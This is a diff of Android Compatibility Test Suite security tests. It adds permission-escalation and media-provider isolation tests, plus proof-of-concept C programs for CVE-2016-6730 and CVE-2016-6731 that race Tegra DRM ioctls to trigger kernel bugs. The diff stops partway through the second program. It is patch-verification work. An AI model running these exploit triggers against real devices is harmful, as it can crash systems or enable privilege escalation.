assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestPermissionFromTwoGroups");
}
// public void testOnlyRequestedPermissionsGranted24() throws Exception {
// assertNull(getDevice().installPackage(
// MigrationHelper.getTestFile(mCtsBuild, APK_24), false, false));
-// runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest24",
+// runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest24",
// "testOnlyRequestedPermissionsGranted");
// }
public void testUpgradeKeepsPermissions() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testAllPermissionsGrantedByDefault");
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testAllPermissionsGrantedOnUpgrade");
}
@@ -253,12 +261,12 @@
public void testNoResidualPermissionsOnUninstall() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testNoResidualPermissionsOnUninstall_part1");
- assertNull(getDevice().uninstallPackage(PKG));
+ assertNull(getDevice().uninstallPackage(USES_PERMISSION_PKG));
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testNoResidualPermissionsOnUninstall_part2");
}
@@ -266,28 +274,38 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testRevokePropagatedOnUpgradeOldToNewModel_part1");
fail("App must be killed on a permission revoke");
} catch (AssertionError expected) {
}
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeOldToNewModel_part2");
}
public void testRevokePropagatedOnUpgradeNewToNewModel() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeNewToNewModel_part1");
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeNewToNewModel_part2");
}
+ public void testNoPermissionEscalation() throws Exception {
+ assertNull(getDevice().installPackage(MigrationHelper.getTestFile(
+ mCtsBuild, APK_DECLARE_NON_RUNTIME_PERMISSIONS), false, false));
+ assertNull(getDevice().installPackage(MigrationHelper.getTestFile(
+ mCtsBuild, APK_ESCLATE_TO_RUNTIME_PERMISSIONS), true, false));
+ runDeviceTests(ESCALATE_PERMISSION_PKG,
+ "com.android.cts.escalatepermission.PermissionEscalationTest",
+ "testCannotEscalateNonRuntimePermissionsToRuntime");
+ }
+
private void runDeviceTests(String packageName, String testClassName, String testMethodName)
throws DeviceNotAvailableException {
Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
diff --git a/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk
new file mode 100644
index 0000000..b98ba68
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk
@@ -0,0 +1,29 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+
+LOCAL_PACKAGE_NAME := CtsDeclareNonRuntimePermissions
+
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml
new file mode 100644
index 0000000..411a66b
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.escalate.permission">
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="normal"/>
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="signature"/>
+
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"/>
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"/>
+
+ <application android:hasCode="false"/>
+
+</manifest>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk
new file mode 100644
index 0000000..b1b7f83
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk
@@ -0,0 +1,35 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+
+LOCAL_STATIC_JAVA_LIBRARIES := android-support-test
+
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := CtsEscalateToRuntimePermissions
+
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_PROGUARD_ENABLED := disabled
+
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml
new file mode 100644
index 0000000..198bb39
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.escalate.permission">
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="dangerous"/>
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="dangerous"/>
+
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"/>
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"/>
+
+ <application/>
+
+
+ <instrumentation
+ android:name="android.support.test.runner.AndroidJUnitRunner"
+ android:targetPackage="com.android.cts.escalate.permission" />
+
+</manifest>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml
new file mode 100644
index 0000000..bd208bc
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!-- Just need this dummy file to force building Manifest.java. -->
+<resources xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2">
+ <string name="keysets_perm_desc">keysets_perm_description</string>
+</resources>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java
new file mode 100644
index 0000000..bbe8e02
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.cts.escalatepermission;
+
+import android.content.Context;
+import android.content.pm.PermissionInfo;
+import android.support.test.InstrumentationRegistry;
+import android.support.test.runner.AndroidJUnit4;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import static org.junit.Assert.assertSame;
+
+import com.android.cts.escalate.permission.Manifest;
+
+@RunWith(AndroidJUnit4.class)
+public class PermissionEscalationTest {
+ @Test
+ public void testCannotEscalateNonRuntimePermissionsToRuntime() throws Exception {
+ Context context = InstrumentationRegistry.getTargetContext();
+
+ // Ensure normal permission cannot be made dangerous
+ PermissionInfo stealAudio1Permission1 = context.getPackageManager()
+ .getPermissionInfo(Manifest.permission.STEAL_AUDIO1, 0);
+ assertSame("Shouldn't be able to change normal permission to dangerous",
+ PermissionInfo.PROTECTION_NORMAL, (stealAudio1Permission1.protectionLevel
+ & PermissionInfo.PROTECTION_MASK_BASE));
+
+ // Ensure signature permission cannot be made dangerous
+ PermissionInfo stealAudio1Permission2 = context.getPackageManager()
+ .getPermissionInfo(Manifest.permission.STEAL_AUDIO2, 0);
+ assertSame("Shouldn't be able to change signature permission to dangerous",
+ PermissionInfo.PROTECTION_SIGNATURE, (stealAudio1Permission2.protectionLevel
+ & PermissionInfo.PROTECTION_MASK_BASE));
+ }
+ }
diff --git a/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java b/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
index d9f00d2..3cf1443 100644
--- a/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
+++ b/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
@@ -17,15 +17,20 @@
package com.android.cts.multiuserstorageapp;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.assertDirNoAccess;
+import static com.android.cts.externalstorageapp.CommonExternalStorageTest.assertFileNoAccess;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.getAllPackageSpecificPathsExceptObb;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.readInt;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.writeInt;
+import android.content.ContentResolver;
+import android.content.ContentValues;
+import android.net.Uri;
import android.os.Environment;
import android.test.AndroidTestCase;
import android.util.Log;
import java.io.File;
+import java.io.FileNotFoundException;
/**
* Test multi-user emulated storage environment, ensuring that each user has
@@ -138,6 +143,36 @@
}
}
+ /**
+ * Verify that files cannot be accessed through media provider.
+ */
+ public void testMediaProviderUserIsolation() throws Exception {
+ final File myPath = Environment.getExternalStorageDirectory();
+ final int myId = android.os.Process.myUid() / 100000;
+ assertEquals(String.valueOf(myId), myPath.getName());
+
+ Log.d(TAG, "My path is " + myPath + " user id " + myId);
+ final File basePath = myPath.getParentFile();
+ for (int i = 0; i < 128; i++) {
+ if (i == myId) continue;
+ final File otherPath = new File(basePath,i + "/" + FILE_SINGLETON);
+ assertFileNoAccess(otherPath);
+
+ final String URI_MEDIA_STRING = "content://media/external/audio/media/";
+ ContentResolver contentResolver = mContext.getContentResolver();
+ ContentValues cv = new ContentValues();
+ cv.put("_data", otherPath.getAbsolutePath());
+ contentResolver.insert(Uri.parse(URI_MEDIA_STRING), cv);
+
+ try {
+ mContext.getContentResolver().openInputStream(Uri.parse(URI_MEDIA_STRING));
+ fail("Accessing through media provider should not be allowed. Path " + myPath);
+ } catch (FileNotFoundException expected) {
+ // OK
+ }
+ }
+ }
+
private File buildApiObbPath(String file) {
return new File(getContext().getObbDir(), file);
}
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 0056e81..cd68c69 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -14,6 +14,38 @@
limitations under the License.
-->
<configuration description="Config for the CTS Security host tests">
+ <target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
+ <option name="cleanup" value="true" />
+ <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
+ <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
+ <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
+ <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
+ <option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
+ <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
+ <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
+ <option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
+ <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
+ <option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
+ <option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
+ <option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
+ <option name="push" value="CVE-2016-6733->/data/local/tmp/CVE-2016-6733" />
+ <option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
+ <option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
+ <option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
+ <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
+ <option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
+ <option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
+ <option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
+ <option name="push" value="CVE-2016-8428->/data/local/tmp/CVE-2016-8428" />
+ <option name="push" value="CVE-2016-8429->/data/local/tmp/CVE-2016-8429" />
+ <option name="push" value="CVE-2016-8430->/data/local/tmp/CVE-2016-8430" />
+ <option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
+ <option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
+ <option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
+ <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
+ <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
+ <option name="append-bitness" value="true" />
+ </target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsSecurityHostTestCases.jar" />
<option name="runtime-hint" value="32s" />
diff --git a/hostsidetests/security/securityPatch/Android.mk b/hostsidetests/security/securityPatch/Android.mk
new file mode 100644
index 0000000..41a41d0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Android.mk
@@ -0,0 +1,17 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+include $(call all-subdir-makefiles)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
new file mode 100644
index 0000000..14337ab
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6730
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
new file mode 100644
index 0000000..bfcdb41
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
@@ -0,0 +1,164 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_GET_CLK_CONSTRAINT 0x12
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
new file mode 100644
index 0000000..718dbe3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6731
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
new file mode 100644
index 0000000..d6cedfb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
